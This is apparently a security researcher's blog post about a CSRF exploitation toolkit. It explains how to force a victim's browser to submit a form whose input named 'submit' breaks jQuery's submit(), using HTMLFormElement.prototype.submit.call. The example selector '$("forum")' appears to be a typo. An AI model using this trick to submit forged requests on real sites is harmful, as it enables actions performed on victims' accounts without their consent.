This first post is related with one of my project : CSRFT. CSRFT is a Cross Site Request Forgery (CSRF) vulnerabilities Toolkit.
My toolkit allows you to exploit either GET and POST HTTP Requests. During some testings, I had issues with some specific forms.
Let’s take an example of such form :
<form action="http://website.com/blog/" id="form" method="get">
<label class="assistive-text" for="s">Search</label>
<input class="field" id="s" name="s" placeholder="Search" type="text" value="Search Value"/>
<input class="submit" id="searchsubmit" name="submit" type="submit" value="Search"/>
</form>
The code injected on the page to submit the form was like that :
$("#form").submit();
However, the form was not submitted.
Why ?
After browsing the internet, I found that there was a conflict with the submit input.
Let’s try to debug wih FireBug :
$("#form").submit();
TypeError: $(...).submit is not a function
And then :
$("#form").submit
<input id="searchsubmit" class="submit" type="submit" value="Search" name="submit">
As I said earlier, this is because there’s a conflict with the Submit input. When there’s such input, it’s then not possible to “force” the victim to send the payload.
How to force submitting it ?
To submit a form, you can use the native function.
Basic example :
HTMLFormElement.prototype.submit.call($("forum")[0]);
With such example, the argument of the function is the selector of the form. Here, you submit the first form that you find in the DOM. Using this technique, I’ve been able to “overwrite” those (conflicts) inputs and submit the form even if it contains some.
Have fun !